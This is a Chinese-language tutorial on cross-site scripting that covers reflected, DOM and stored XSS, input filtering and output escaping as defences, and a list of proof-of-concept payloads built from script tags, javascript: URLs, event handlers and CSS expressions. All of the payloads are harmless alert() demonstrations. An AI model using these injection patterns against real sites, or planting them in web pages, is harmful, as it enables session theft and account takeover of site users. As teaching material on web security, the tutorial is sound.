赞
踩
目录
XSS中文为跨站脚本攻击,恶意攻击者在web页面中会插入一些恶意的script代码。当用户浏览该页面的时候,那么嵌入到web页面中script代码会执行,因此会达到恶意攻击用户的目的。
- 1、窃取管理员帐号或Cookie,入侵者可以冒充管理员的身份登录后台。使得入侵者具有恶意操纵后台数据的能力,包括读取、更改、添加、删除一些信息。
- 2、窃取用户的个人信息或者登录帐号,对网站的用户安全产生巨大的威胁。例如冒充用户身份进行各种操作。
- 3、网站挂马。先将恶意攻击代码嵌入到Web应用程序之中。当用户浏览该挂马页面时,用户的计算机会被植入木马。
- 4、发送广告或者垃圾信息。攻击者可以利用XSS漏洞植入广告,或者发送垃圾信息,严重影响到用户的正常使用。
反射性xss一般指攻击者通过特定的方式来诱惑受害者去访问一个包含恶意代码的URL。当受害者点击恶意链接url的时候,恶意代码会直接在受害者的主机上的浏览器执行。
1. 攻击者在url后面的参数中加入恶意攻击代码。
2. 当用户打开带有恶意代码的URL的时候,网站服务端将恶意代码从URL中取出,拼接在html中并且返回给浏览器端。
3. 用户浏览器接收到响应后执行解析,其中的恶意代码也会被执行到。
4. 攻击者通过恶意代码来窃取到用户数据并发送到攻击者的网站。攻击者会获取到比如cookie等信息,然后使用该信息来冒充合法用户的行为,调用目标网站接口执行攻击等操作。
我们客户端的js可以对页面dom节点进行动态的操作,比如插入、修改页面的内容。比如说客户端从URL中提取数据并且在本地执行、如果用户在客户端输入的数据包含了恶意的js脚本的话,但是这些脚本又没有做任何过滤处理的话,那么我们的应用程序就有可能受到DOM XSS的攻击。
DOM XSS 是基于文档对象模型的XSS。一般有如下DOM操作:
1. 使用document.write直接输出数据。
2. 使用innerHTML直接输出数据。
3. 使用location、location.href、location.replace、iframe.src、document.referer、window.name等这些。
反射型XSS与DOM型区别:
1、反射型XSS攻击中,服务器在返回HTML文档的时候,就已经包含了恶意的脚本;
2、DOM型ⅩSS攻击中,服务器在返回HTML文档的时候,是不包含恶意脚本的;恶意脚本是在其执行了非恶意脚本后,被注入到文档里的
存储型XSS的原理是:主要是将恶意代码上传或存储到服务器中,下次只要受害者浏览包含此恶意代码的页面就会执行恶意代码。将恶意代码写进数据库或文件等可以永久保存数据的介质中。
1. 攻击者将恶意代码提交到目标网站数据库中。
2. 用户打开目标网站时,网站服务器将恶意代码从数据库中取出,然后拼接到html中返回给浏览器中。
3. 用户浏览器接收到响应后解析执行,那么其中的恶意代码也会被执行。
4. 那么恶意代码执行后,就能获取到用户数据
形成XSS漏洞的主要原因是程序对输入和输出的控制不够严格,导致“精心构造”的脚本输入后,在输到前端时被浏览器当作有效代码解析执行从而产生危害。
因此在XSS漏洞的防范上,一般会采用“对输入进行过滤”和“输出进行转义”的方式进行处理: 输入过滤:对输入进行过滤,不允许可能导致XSS攻击的字符输入; 输出转义:根据输出点的位置对输出到前端的内容进行适当转义; xss经常出现的地方在数据交互的地方和数据输出的地方。
1.第一种:可以利用[<>]构造HTML/JS语句,如<script>标签等
- <script>alert(/xss/)</script>
- <script>confirm('xss')</script>
- <script>prompt('xss')</script>
2.第二种:可以利用javascript:伪协议的方式构造XSS。
- <a href="javascript:alert(/xss/)">touch me</a> //利用a标签的javascript:伪协议
- <img src="javascript:alert(/xss/)" > //利用img标签的javascript:伪协议,但是这种方式在IE6下测试成功,在IE8失败
3.第三种:事件驱动:事件驱动是一种比较经典的编程思想。在网页内会发生很多事件(比如鼠标移动,键盘输入等),JS可以对此类事件进行响应,因此我们可以通过事件触发JS函数,触发XSS。事件种类主要有以下几种。
Windows事件:对Windows对象触发的事件;
Form事件:HTML表单内的动作触发事件;
keyboard事件:键盘按键;
Mouse事件:有鼠标或类似用户动作触发的事件;
Media事件:由多媒体触发的事件。
- <img src='./smile.jpg' onmouseover='alert(/xss/)'> //该标签会引入一张图片,然后鼠标悬停在图片上的时候,会触发XSS代码。
- <img src='./smile.jpg' onerror='alert(/xss/)'> //onerror会在文档载入失败时触发XSS,比如下一个语句
- <img src='#' onerror='alert(/xss/)'> //与上一个语句相比,将文件路径改成#,一定载入失败,触发XSS
- <input type="text" onkeydown="alert(/xss/)"> //单行文本框的键盘点击事件,当点击键盘任一按键时触发XSS。
- <input type="text" onkeyup="alert(/xss/)">
- <input type="button" onclick="alert(/xss/)">
4.第四种:是利用CSS(层叠样式脚本)触发XSS的
- // 行内样式
- <div style = "backgroud-image:url(javascript:alert(/xss/))">
- //页内样式
- <style>Body{backgroud-image:url(javascript:alert(/xss/))}</style>
- //外部样式
- <link rel="stylesheet" type="text/css" href="./xss.css"><div>hello<div>
- //其中xss.css文本内容如下
- h1 {color:red;}
- div{
- /*width:expression(alert(/xss/))*/
- backgroud-image:url(javascript:alert(/xss/))
- }
- @ expression
- <div style="width:expression(alert(/xss/))">
- <style>Body{backgroud-image:expression(alert(/xss/));}</style>
- @import
- <style>@import 'javascript:alert("xss")';</style>
- <style type="text/css">@import url(xss.css);</style><div>HELLO</div>
5.其他标签及手法,利用一些比较新的前端标签进行构造。
- <svg onload="alert(/xss/)">
- <input onfocus=alert(xss/) autofocus>
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。